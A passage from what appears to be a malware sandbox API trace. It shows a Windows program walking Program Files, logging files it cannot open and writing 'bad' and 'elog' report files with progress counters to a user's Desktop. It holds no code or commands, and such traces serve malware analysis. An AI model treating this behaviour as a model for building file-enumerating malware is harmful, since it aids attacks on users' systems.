denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Uninstall Information\\italian.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\n", cchWideChar=4182, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4182 [0218.093] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Uninstall Information\\italian.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\n", cchWideChar=4182, lpMultiByteStr=0x24866c8, cbMultiByte=4182, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Uninstall Information\\italian.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\n1", lpUsedDefaultChar=0x0) returned 4182 [0218.093] WriteFile (in: hFile=0x2f8, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x1056, lpNumberOfBytesWritten=0x63fe20, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x63fe20*=0x1056, lpOverlapped=0x0) returned 1 [0218.093] CloseHandle (hObject=0x2f8) returned 1 [0218.106] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=247 / B=1 / T=2891", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0218.106] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=247 / B=1 / T=2891", cchWideChar=38, lpMultiByteStr=0x1fe5514, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][10]: G=247 / B=1 / T=2891", lpUsedDefaultChar=0x0) returned 38 [0218.106] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x63feb4, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x63feb4*=0x26, lpOverlapped=0x0) returned 1 [0218.111] Sleep (dwMilliseconds=0x5dc) [0219.711] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\bad_460F9943EA70F103.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\bad_460f9943ea70f103.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2b8 [0219.796] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Program Files\\Microsoft Office 15\\alfred.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\n", cchWideChar=124, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 124 [0219.796] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Program Files\\Microsoft Office 15\\alfred.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\n", cchWideChar=124, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 124 [0219.796] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Program Files\\Microsoft Office 15\\alfred.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\n", cchWideChar=124, lpMultiByteStr=0x1f3cf00, cbMultiByte=124, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATO_OPER: C:\\Program Files\\Microsoft Office 15\\alfred.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\n\x80¯ó\x01°\x04\x02", lpUsedDefaultChar=0x0) returned 124 [0219.796] WriteFile (in: hFile=0x2b8, lpBuffer=0x1f3cf00*, nNumberOfBytesToWrite=0x7c, lpNumberOfBytesWritten=0x63fe20, lpOverlapped=0x0 | out: lpBuffer=0x1f3cf00*, lpNumberOfBytesWritten=0x63fe20*=0x7c, lpOverlapped=0x0) returned 1 [0219.797] CloseHandle (hObject=0x2b8) returned 1 [0219.858] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\elog_460F9943EA70F103.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\elog_460f9943ea70f103.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0219.860] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Uninstall Information\\italian.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\november.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\syria promptly.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". A", cchWideChar=5257, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5257 [0219.860] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Uninstall Information\\italian.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\november.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Google\\syria promptly.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". A", cchWideChar=5257, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5257 [0219.860] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is 